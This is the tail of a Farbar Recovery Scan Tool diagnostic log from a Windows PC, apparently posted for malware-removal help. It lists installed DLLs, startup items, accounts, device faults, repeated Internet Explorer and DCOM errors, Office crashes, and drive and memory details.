    2013-09-28 20:13 - 2013-09-28 20:13 - 00052224 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\imageformats\qico.dll
    2013-09-28 20:13 - 2013-09-28 20:13 - 00261120 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\imageformats\qjpeg.dll
    2013-09-28 20:13 - 2013-09-28 20:13 - 00046080 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\imageformats\qsvg.dll
    2013-11-10 20:58 - 2013-11-10 20:58 - 00078848 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\DiagnosePlugin.dll
    2013-11-10 20:56 - 2013-11-10 20:56 - 00140288 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\DiagnoseDll.dll
    2013-11-10 20:56 - 2013-11-10 20:56 - 00072192 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\SVTUtils.dll
    2013-11-10 20:56 - 2013-11-10 20:56 - 00074752 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\NetcardApi.dll
    2013-11-10 20:56 - 2013-11-10 20:56 - 00136704 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\airprintdll.dll
    2013-12-05 06:43 - 2013-12-05 06:43 - 00641536 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\InnerPlugin_Update.dll
    2013-11-10 21:24 - 2013-11-10 21:24 - 00458752 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\InnerPlugin_WirelessExport.dll
    2013-11-10 21:23 - 2013-11-10 21:23 - 00046080 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\WSetupApiPlugin.dll
    2013-11-10 20:56 - 2013-11-10 20:56 - 00066560 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\WSetupDll.dll
    2013-09-28 20:13 - 2013-09-28 20:13 - 00040960 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\printsupport\windowsprintersupport.dll
    2014-12-20 10:57 - 2014-12-20 10:57 - 38562088 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
    2013-02-13 19:55 - 2013-02-13 19:55 - 00755712 _____ () C:\WINDOWS\assembly\GAC_32\System.Data.SQLite\1.0.56.0__28c9bcd4dddc48a1\System.Data.SQLite.dll
    2013-02-13 19:55 - 2013-02-13 19:55 - 00471040 _____ () C:\WINDOWS\assembly\GAC_MSIL\Intuit.Spc.Map.Reporter\4.0.114.0__7ce6deabcb36a8ea\Intuit.Spc.Map.Reporter.dll
    2013-02-13 14:10 - 2013-02-13 14:10 - 00854016 _____ () C:\WINDOWS\assembly\GAC_32\System.Data.SQLite\1.0.61.0__db937bc2d44ff139\System.Data.SQLite.dll
    2013-02-13 14:10 - 2013-02-13 14:10 - 00471040 _____ () C:\WINDOWS\assembly\GAC_MSIL\Intuit.Spc.Map.Reporter\5.0.104.0__7ce6deabcb36a8ea\Intuit.Spc.Map.Reporter.dll
    2012-11-29 16:59 - 2012-11-29 16:59 - 00093696 _____ () C:\Program Files (x86)\FileZilla FTP Client\fzshellext.dll
    2014-12-12 23:14 - 2014-12-05 20:50 - 01077064 _____ () C:\Program Files (x86)\Google\Chrome\Application\39.0.2171.95\libglesv2.dll
    2014-12-12 23:14 - 2014-12-05 20:50 - 00211272 _____ () C:\Program Files (x86)\Google\Chrome\Application\39.0.2171.95\libegl.dll
    2014-12-12 23:14 - 2014-12-05 20:50 - 09009480 _____ () C:\Program Files (x86)\Google\Chrome\Application\39.0.2171.95\pdf.dll
    2014-12-12 23:14 - 2014-12-05 20:50 - 01677128 _____ () C:\Program Files (x86)\Google\Chrome\Application\39.0.2171.95\ffmpegsumo.dll
    2014-12-12 23:14 - 2014-12-05 20:50 - 14913352 _____ () C:\Program Files (x86)\Google\Chrome\Application\39.0.2171.95\PepperFlash\pepflashplayer.dll

    ==================== Alternate Data Streams (whitelisted) =========

    (If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

    AlternateDataStreams: C:\Users\NorMac\AppData\Roaming\Tab Separated Values (Windows).EML:OECustomProperty

    ==================== Safe Mode (whitelisted) ===================

    (If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MZA => ""="service"

    ==================== EXE Association (whitelisted) =============

    (If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


    ==================== MSCONFIG/TASK MANAGER disabled items =========

    (Currently there is no automatic fix for this section.)

    HKLM\...\StartupApproved\StartupFolder: => "WDDMStatus.lnk"
    HKLM\...\StartupApproved\StartupFolder: => "QuickBooks Update Agent.lnk"
    HKLM\...\StartupApproved\Run32: => "HP Software Update"
    HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
    HKLM\...\StartupApproved\Run32: => "TkBellExe"
    HKLM\...\StartupApproved\Run32: => "APSDaemon"
    HKLM\...\StartupApproved\Run32: => "QuickTime Task"
    HKLM\...\StartupApproved\Run32: => "WD Quick View"
    HKLM\...\StartupApproved\Run32: => "iTunesHelper"
    HKLM\...\StartupApproved\Run32: => "Intuit SyncManager"
    HKLM\...\StartupApproved\Run32: => "LTCM Client"
    HKLM\...\StartupApproved\Run32: => "Wondershare Helper Compact.exe"
    HKU\S-1-5-21-485173556-832918840-2370493585-1000\...\StartupApproved\StartupFolder: => "eFax 4.4.lnk"
    HKU\S-1-5-21-485173556-832918840-2370493585-1000\...\StartupApproved\StartupFolder: => "HMA Pro VPN 2.0.lnk"
    HKU\S-1-5-21-485173556-832918840-2370493585-1000\...\StartupApproved\Run: => "HP Officejet Pro 8600 (NET)"
    HKU\S-1-5-21-485173556-832918840-2370493585-1000\...\StartupApproved\Run: => "eFax 4.4"
    HKU\S-1-5-21-485173556-832918840-2370493585-1000\...\StartupApproved\Run: => "CCleaner Monitoring"
    HKU\S-1-5-21-485173556-832918840-2370493585-1000\...\StartupApproved\Run: => "EssentialPIM"

    ========================= Accounts: ==========================

    Administrator (S-1-5-21-485173556-832918840-2370493585-500 - Administrator - Disabled)
    Guest (S-1-5-21-485173556-832918840-2370493585-501 - Limited - Disabled)
    HomeGroupUser$ (S-1-5-21-485173556-832918840-2370493585-1002 - Limited - Enabled)
    NorMac (S-1-5-21-485173556-832918840-2370493585-1000 - Administrator - Enabled) => C:\Users\NorMac

    ==================== Faulty Device Manager Devices =============

    Name: Microsoft PS/2 Mouse
    Description: Microsoft PS/2 Mouse
    Class Guid: {4d36e96f-e325-11ce-bfc1-08002be10318}
    Manufacturer: Microsoft
    Service: i8042prt
    Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
    Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
    Devices stay in this state if they have been prepared for removal.
    After you remove the device, this error disappears.Remove the device, and this error should be resolved.

    Name: Officejet J6400 series
    Description: Officejet J6400 series
    Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
    Manufacturer: HP
    Service:
    Problem: : This device is disabled. (Code 22)
    Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

    Name:
    Description:
    Class Guid:
    Manufacturer:
    Service:
    Problem: : The drivers for this device are not installed. (Code 28)
    Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

    Name:
    Description:
    Class Guid:
    Manufacturer:
    Service:
    Problem: : The drivers for this device are not installed. (Code 28)
    Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

    Name: Officejet J6400 series
    Description: Officejet J6400 series
    Class Guid: {6bdd1fc6-810f-11d0-bec7-08002be2092f}
    Manufacturer: HP
    Service: StillCam
    Problem: : This device is disabled. (Code 22)
    Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.


    ==================== Event log errors: =========================

    Application errors:
    ==================
    Error: (01/04/2015 09:13:45 AM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: iexplore.exe, version: 10.0.9200.17183, time stamp: 0x50ecdcd3
    Faulting module name: ntdll.dll, version: 6.2.9200.16420, time stamp: 0x505aaa82
    Exception code: 0xc0000005
    Fault offset: 0x00061233
    Faulting process id: 0x2ec4
    Faulting application start time: 0xiexplore.exe0
    Faulting application path: iexplore.exe1
    Faulting module path: iexplore.exe2
    Report Id: iexplore.exe3
    Faulting package full name: iexplore.exe4
    Faulting package-relative application ID: iexplore.exe5

    Error: (01/04/2015 09:02:47 AM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: iexplore.exe, version: 10.0.9200.17183, time stamp: 0x5010a55f
    Faulting module name: ntdll.dll, version: 6.2.9200.16420, time stamp: 0x505aaa82
    Exception code: 0xc0000005
    Fault offset: 0x00061206
    Faulting process id: 0x3928
    Faulting application start time: 0xiexplore.exe0
    Faulting application path: iexplore.exe1
    Faulting module path: iexplore.exe2
    Report Id: iexplore.exe3
    Faulting package full name: iexplore.exe4
    Faulting package-relative application ID: iexplore.exe5

    Error: (01/04/2015 08:56:10 AM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: iexplore.exe, version: 10.0.9200.17183, time stamp: 0x5010a55f
    Faulting module name: ntdll.dll, version: 6.2.9200.16420, time stamp: 0x505aaa82
    Exception code: 0xc0000005
    Fault offset: 0x00061206
    Faulting process id: 0x3594
    Faulting application start time: 0xiexplore.exe0
    Faulting application path: iexplore.exe1
    Faulting module path: iexplore.exe2
    Report Id: iexplore.exe3
    Faulting package full name: iexplore.exe4
    Faulting package-relative application ID: iexplore.exe5

    Error: (01/04/2015 08:47:35 AM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: iexplore.exe, version: 10.0.9200.17183, time stamp: 0x505a96c3
    Faulting module name: ntdll.dll, version: 6.2.9200.16420, time stamp: 0x505aaa82
    Exception code: 0xc0000005
    Fault offset: 0x00061206
    Faulting process id: 0x654
    Faulting application start time: 0xiexplore.exe0
    Faulting application path: iexplore.exe1
    Faulting module path: iexplore.exe2
    Report Id: iexplore.exe3
    Faulting package full name: iexplore.exe4
    Faulting package-relative application ID: iexplore.exe5

    Error: (01/04/2015 08:45:39 AM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: iexplore.exe, version: 10.0.9200.17183, time stamp: 0x5010888a
    Faulting module name: ntdll.dll, version: 6.2.9200.16420, time stamp: 0x505aaa82
    Exception code: 0xc0000005
    Fault offset: 0x0005811c
    Faulting process id: 0x3238
    Faulting application start time: 0xiexplore.exe0
    Faulting application path: iexplore.exe1
    Faulting module path: iexplore.exe2
    Report Id: iexplore.exe3
    Faulting package full name: iexplore.exe4
    Faulting package-relative application ID: iexplore.exe5

    Error: (01/04/2015 08:40:20 AM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: iexplore.exe, version: 10.0.9200.17183, time stamp: 0x5010888a
    Faulting module name: ntdll.dll, version: 6.2.9200.16420, time stamp: 0x505aaa82
    Exception code: 0xc0000005
    Fault offset: 0x00061206
    Faulting process id: 0x261c
    Faulting application start time: 0xiexplore.exe0
    Faulting application path: iexplore.exe1
    Faulting module path: iexplore.exe2
    Report Id: iexplore.exe3
    Faulting package full name: iexplore.exe4
    Faulting package-relative application ID: iexplore.exe5

    Error: (01/04/2015 08:39:22 AM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: iexplore.exe, version: 10.0.9200.17183, time stamp: 0x5010888a
    Faulting module name: ntdll.dll, version: 6.2.9200.16420, time stamp: 0x505aaa82
    Exception code: 0xc0000005
    Fault offset: 0x00061206
    Faulting process id: 0x380c
    Faulting application start time: 0xiexplore.exe0
    Faulting application path: iexplore.exe1
    Faulting module path: iexplore.exe2
    Report Id: iexplore.exe3
    Faulting package full name: iexplore.exe4
    Faulting package-relative application ID: iexplore.exe5

    Error: (01/04/2015 08:38:40 AM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: iexplore.exe, version: 10.0.9200.17183, time stamp: 0x50109188
    Faulting module name: ntdll.dll, version: 6.2.9200.16420, time stamp: 0x505aaa82
    Exception code: 0xc0000005
    Fault offset: 0x00061206
    Faulting process id: 0x3788
    Faulting application start time: 0xiexplore.exe0
    Faulting application path: iexplore.exe1
    Faulting module path: iexplore.exe2
    Report Id: iexplore.exe3
    Faulting package full name: iexplore.exe4
    Faulting package-relative application ID: iexplore.exe5

    Error: (01/04/2015 08:30:08 AM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: iexplore.exe, version: 10.0.9200.17183, time stamp: 0x50109de9
    Faulting module name: ntdll.dll, version: 6.2.9200.16420, time stamp: 0x505aaa82
    Exception code: 0xc0000005
    Fault offset: 0x00061206
    Faulting process id: 0x40
    Faulting application start time: 0xiexplore.exe0
    Faulting application path: iexplore.exe1
    Faulting module path: iexplore.exe2
    Report Id: iexplore.exe3
    Faulting package full name: iexplore.exe4
    Faulting package-relative application ID: iexplore.exe5

    Error: (01/04/2015 08:29:15 AM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: iexplore.exe, version: 10.0.9200.17183, time stamp: 0x5010a64a
    Faulting module name: ntdll.dll, version: 6.2.9200.16420, time stamp: 0x505aaa82
    Exception code: 0xc0000005
    Fault offset: 0x00061206
    Faulting process id: 0x2970
    Faulting application start time: 0xiexplore.exe0
    Faulting application path: iexplore.exe1
    Faulting module path: iexplore.exe2
    Report Id: iexplore.exe3
    Faulting package full name: iexplore.exe4
    Faulting package-relative application ID: iexplore.exe5


    System errors:
    =============
    Error: (01/03/2015 11:34:16 PM) (Source: DCOM) (EventID: 10010) (User: LEVIATHON)
    Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

    Error: (01/03/2015 11:11:03 PM) (Source: DCOM) (EventID: 10010) (User: LEVIATHON)
    Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

    Error: (01/03/2015 11:04:52 PM) (Source: DCOM) (EventID: 10010) (User: LEVIATHON)
    Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

    Error: (01/03/2015 11:04:20 PM) (Source: DCOM) (EventID: 10010) (User: LEVIATHON)
    Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

    Error: (01/03/2015 11:03:48 PM) (Source: DCOM) (EventID: 10010) (User: LEVIATHON)
    Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

    Error: (01/03/2015 11:03:13 PM) (Source: DCOM) (EventID: 10010) (User: LEVIATHON)
    Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

    Error: (01/03/2015 11:02:40 PM) (Source: DCOM) (EventID: 10010) (User: LEVIATHON)
    Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

    Error: (01/03/2015 11:02:07 PM) (Source: DCOM) (EventID: 10010) (User: LEVIATHON)
    Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

    Error: (01/03/2015 11:01:34 PM) (Source: DCOM) (EventID: 10010) (User: LEVIATHON)
    Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

    Error: (01/03/2015 11:01:02 PM) (Source: DCOM) (EventID: 10010) (User: LEVIATHON)
    Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}


    Microsoft Office Sessions:
    =========================
    Error: (12/31/2014 10:13:36 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
    Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 9915 seconds with 540 seconds of active time. This session ended with a crash.

    Error: (12/19/2014 00:19:58 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
    Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 68031 seconds with 2220 seconds of active time. This session ended with a crash.

    Error: (11/11/2014 00:17:42 AM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
    Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 766754 seconds with 9660 seconds of active time. This session ended with a crash.

    Error: (10/30/2014 08:57:42 AM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
    Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 232690 seconds with 11580 seconds of active time. This session ended with a crash.

    Error: (08/06/2014 09:20:19 AM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
    Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 43925 seconds with 1920 seconds of active time. This session ended with a crash.

    Error: (07/31/2014 01:50:22 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
    Description: ID: 1, Application Name: Microsoft Office Excel, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 1115 seconds with 420 seconds of active time. This session ended with a crash.

    Error: (07/25/2014 01:35:22 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
    Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 277794 seconds with 7680 seconds of active time. This session ended with a crash.

    Error: (07/22/2014 08:25:18 AM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
    Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 87246 seconds with 660 seconds of active time. This session ended with a crash.

    Error: (07/16/2014 10:16:04 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
    Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 27085 seconds with 1980 seconds of active time. This session ended with a crash.

    Error: (07/16/2014 02:05:38 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
    Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 529236 seconds with 21420 seconds of active time. This session ended with a crash.


    CodeIntegrity Errors:
    ===================================
    Date: 2014-10-30 10:34:04.886
    Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.


    ==================== Memory info ===========================

    Processor: Intel(R) Core(TM) i3 CPU 550 @ 3.20GHz
    Percentage of memory in use: 71%
    Total physical RAM: 6071.11 MB
    Available physical RAM: 1744.52 MB
    Total Pagefile: 9527.11 MB
    Available Pagefile: 3781.24 MB
    Total Virtual: 8192 MB
    Available Virtual: 8191.79 MB

    ==================== Drives ================================

    Drive c: (Acer) (Fixed) (Total:917.74 GB) (Free:5.05 GB) NTFS
    Drive f: (PHONE) (Removable) (Total:0.02 GB) (Free:0.02 GB) FAT

    ==================== MBR & Partition Table ==================

    ========================================================
    Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 7EDF2454)
    Partition 1: (Not Active) - (Size=13.7 GB) - (Type=27)
    Partition 2: (Active) - (Size=100 MB) - (Type=07 NTFS)
    Partition 3: (Not Active) - (Size=917.7 GB) - (Type=07 NTFS)
    Could not read MBR for disk 3.

    ==================== End Of Log ============================
     
Loading...
Similar Threads Forum Date
SOLVED need fixlist for farbar recovery tool Malware Removal Assistance For Windows Oct 31, 2016
Need fixlist.txt for Farbar Recovery Scan Tool Malware Removal Assistance For Windows Mar 23, 2016
Need fixlist.txt for Farbar Recovery Scan Tool, blue screen error c000021a Malware Removal Assistance For Windows Nov 10, 2015